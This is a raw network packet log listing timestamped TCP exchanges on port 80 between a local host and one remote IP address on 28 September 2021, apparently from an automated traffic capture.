Sep 28, 2021 07:38:37.866364956 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.866381884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866403103 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.866453886 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866472006 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866491079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866496086 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.866549969 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.866939068 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866962910 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866981030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.867013931 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.867557049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.867582083 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.867598057 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.867626905 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.867654085 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.868102074 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868124008 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868140936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868191004 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.868598938 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868621111 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868638039 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868643045 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.868685961 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.868904114 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868932009 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868948936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.868968964 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.869343996 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.869365931 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.869385958 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.869395971 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.869404078 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.869426012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.869442940 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.869460106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.869503021 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.886837006 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.886876106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.886892080 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.886919975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.886949062 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.889791012 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.889816999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.889834881 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.889919996 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.889940023 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.889997959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890002012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.890032053 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890075922 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.890134096 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890156984 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890177965 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890203953 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.890798092 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890850067 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.890921116 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890943050 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890963078 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.890985012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.890986919 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891010046 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891031027 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.891165972 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891190052 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891211987 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891212940 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.891271114 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.891479015 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891504049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891525030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891547918 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891551018 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.891568899 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891590118 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.891591072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891611099 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891635895 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891637087 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.891658068 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891668081 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.891680002 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891700983 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891721964 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.891722918 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891743898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.891763926 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.892383099 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.892414093 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.892436981 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.892438889 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.892477036 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.893068075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.893101931 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.893124104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.893146992 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.893170118 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.893194914 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.893205881 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.893228054 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.893274069 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.894455910 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.894490004 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.894515038 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.894541025 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.895361900 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.895391941 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.895414114 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.895431995 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.895440102 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.895464897 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.895466089 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.895484924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.895512104 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.896430016 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.896461964 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.896483898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.896488905 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.896543980 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.896544933 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.896567106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.896586895 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.896609068 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.897442102 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897526026 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.897599936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897624969 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897646904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897685051 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.897764921 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897810936 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.897867918 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897892952 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897918940 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897936106 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.897942066 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897965908 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.897978067 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.898377895 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898413897 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898439884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898446083 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.898478985 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.898509026 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898533106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898551941 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898571968 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.898859978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898900032 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898902893 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.898921013 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.898962975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.899420023 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.899449110 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.899471045 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.899532080 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.899720907 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.899746895 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.899770021 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.899800062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.899835110 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.901042938 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.901074886 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.901097059 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.901119947 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.901412010 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.901442051 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.901463032 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.901467085 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.901500940 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.901983023 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902009964 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902033091 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902050018 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.902353048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902379990 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902400970 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902407885 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.902439117 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.902524948 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902548075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902589083 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902589083 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.902848959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902872086 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902894974 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.902904987 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.902932882 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.903167963 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903206110 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903240919 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.903250933 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903275967 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903295040 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903309107 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.903316021 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903352022 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.903927088 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903954029 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903976917 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.903987885 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.903997898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.904036999 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.904707909 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.904741049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.904761076 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.904783010 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.904783964 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.904803991 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.904812098 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.904825926 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.904861927 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.906965971 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.906991959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.907010078 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.907026052 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.907042027 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.907085896 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.907102108 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.907144070 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.907629967 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.907655001 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.907672882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.907713890 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.910875082 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.910904884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.910921097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.910939932 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.910943031 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.910959005 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.910970926 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.911016941 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.911031008 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911047935 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911063910 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911077023 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911098003 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911111116 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.911129951 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911148071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911148071 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.911163092 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911175966 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911178112 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.911187887 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911204100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911216974 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.911221027 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911237001 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911254883 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911256075 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.911271095 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911288977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.911319017 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.911350012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.925435066 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.925463915 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.925478935 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.925499916 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.925522089 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.925540924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.925542116 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.925606966 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.926668882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.926712036 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.926734924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.926749945 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.926764011 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.926776886 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.926789999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.926809072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.926815987 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.926860094 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.927855968 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.927886009 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.927908897 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.927915096 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.927930117 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.927942038 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.927951097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.927969933 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.927993059 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.930764914 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930794954 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930818081 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930835962 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.930838108 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930859089 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930860043 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.930879116 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930886984 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.930898905 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930922031 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930938005 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.930943966 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930963993 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.930973053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.930983067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931003094 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931014061 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.931021929 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931041002 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931052923 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.931065083 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931087971 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931096077 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.931107044 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931145906 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931150913 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.931201935 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931217909 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931236982 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.931237936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931278944 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.931678057 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931701899 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931723118 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931745052 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931766033 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931776047 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.931802034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.931813002 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.931835890 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.932059050 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.932079077 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.932100058 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.932138920 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.932252884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.932271004 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.932288885 CEST	80	49731	185.138.164.150	192.168.2.5
